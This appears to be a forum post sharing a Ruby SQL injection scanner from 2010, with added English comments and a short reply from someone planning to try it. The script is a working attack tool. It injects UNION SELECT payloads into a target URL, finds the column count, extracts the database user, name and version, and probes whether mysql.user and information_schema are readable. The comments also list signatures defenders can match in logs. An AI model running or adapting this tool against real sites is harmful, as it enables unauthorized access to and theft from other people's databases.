Un scanner de SQLI en ruby
#!usr/bin/ruby
#SQLI Scanner (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'


# Prints the one-line command usage to standard output.
# @return [nil]
def uso
  puts "\n[+] sqli.rb <site>"
end

# Issues a plain-text HTTP GET on port 80 (no TLS) and returns the body.
# @param host [String] hostname of the server
# @param path [String] request target, including any query string
# @return [String, nil] the response body as returned by Net::HTTP
def toma(host,path)
  Net::HTTP.new(host, 80).get(path).body
end

# Second stage of the scan: re-requests the page with the column that
# echoes data (marked by the word "hackman" in `more`, see scan) filled
# with database metadata, then reports what came back.
#
# The hex literal 0x4b30425241 decodes to "K0BRA"; it brackets every
# injected value so the regexps below can cut the values out of the HTML.
# Detection note for defenders: that literal, the "K0BRA" text, and the
# information_schema.tables / mysql.user probes are stable signatures of
# this script family in access logs and WAF rules.
#
# @param web [String] the target URL; assumed to already carry a query
#   string (url.query is nil otherwise and the concatenation on the
#   toma() lines raises TypeError)
# @param more [String] UNION SELECT tail with "hackman" as placeholder
# @return [nil]
def details(web,more) 
# Marker-only variant: used later to test whether a SELECT ... FROM a
# given table executes at all.
web1 = more.sub(/hackman/,"0x4b30425241")
# Metadata variant: user(), database() and version() separated by the marker.
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
# Four markers delimit the three values; $1..$3 are set by the =~ match.
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
  print "[username] : "+$1+"\n"
  print "[database] : "+$2+"\n"
  print "[version] : "+$3+"\n\n"

# If the marker survives with a FROM clause on these tables, the query
# executed, i.e. the application's DB account can read them. A
# least-privilege account (no access to mysql.user) makes these report
# nothing.
test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
  print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
 print "[mysql.user] : ON"
end


else 
  # The metadata query did not echo back; nothing further is attempted.
  print "\n[-] Not Found\n\n"
end
end


# First stage of the scan. Appends a UNION SELECT probe directly to the
# existing query string of `web`, so the injectable parameter is assumed
# to be the last one in the URL.
#
# Vulnerability detection relies entirely on the verbose MySQL error text
# being echoed into the HTML response (the =~ below). Applications that
# do not surface database error messages to the client give this check
# nothing to match, and it reports "Not Vulnerable".
#
# Note: copyright() calls exit(1), so every call to it below terminates
# the whole process; there is no normal return from this method.
#
# @param web [String] target URL; assumed to carry a query string
#   (url.query is nil otherwise and the string concatenation raises
#   TypeError)
# @return [void] never returns normally (process exits)
def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
  print "[+] SQLI Detected\n\n"
  else
  print "[-] Not Vulnerable to SQLI\n\n"
  copyright()
end

# z  : growing comma-separated column list "1,2,3,...".
# x  : the same list with every column wrapped in the 0x4b30425241
#      ("K0BRA") marker, so a column that is echoed into the page can be
#      recognised in the response.
# `num` is a String because the range is over strings ('2'..'25').
z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
# A marker pair in the response means the column count matched and the
# captured number ($1) is the column the page displays.
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
# Replace the echoed column with the placeholder details() substitutes.
z = z.sub($1,"hackman")
print "[SQLI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
# Exits the process; the loop never continues past the first match.
copyright()
end
end
# Only reached when no column count between 2 and 25 produced a marker.
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head() 
  print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
# Entry point: show the banner, then either run the scan on the first
# argument or print usage. copyright exits the process in every path.
head
if ARGV[0]
  scan(ARGV[0])
  copyright
else
  uso
end
copyright

#The End ?
Gracias doddy, la voy a tratar a ver cómo anda. Saludos
Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
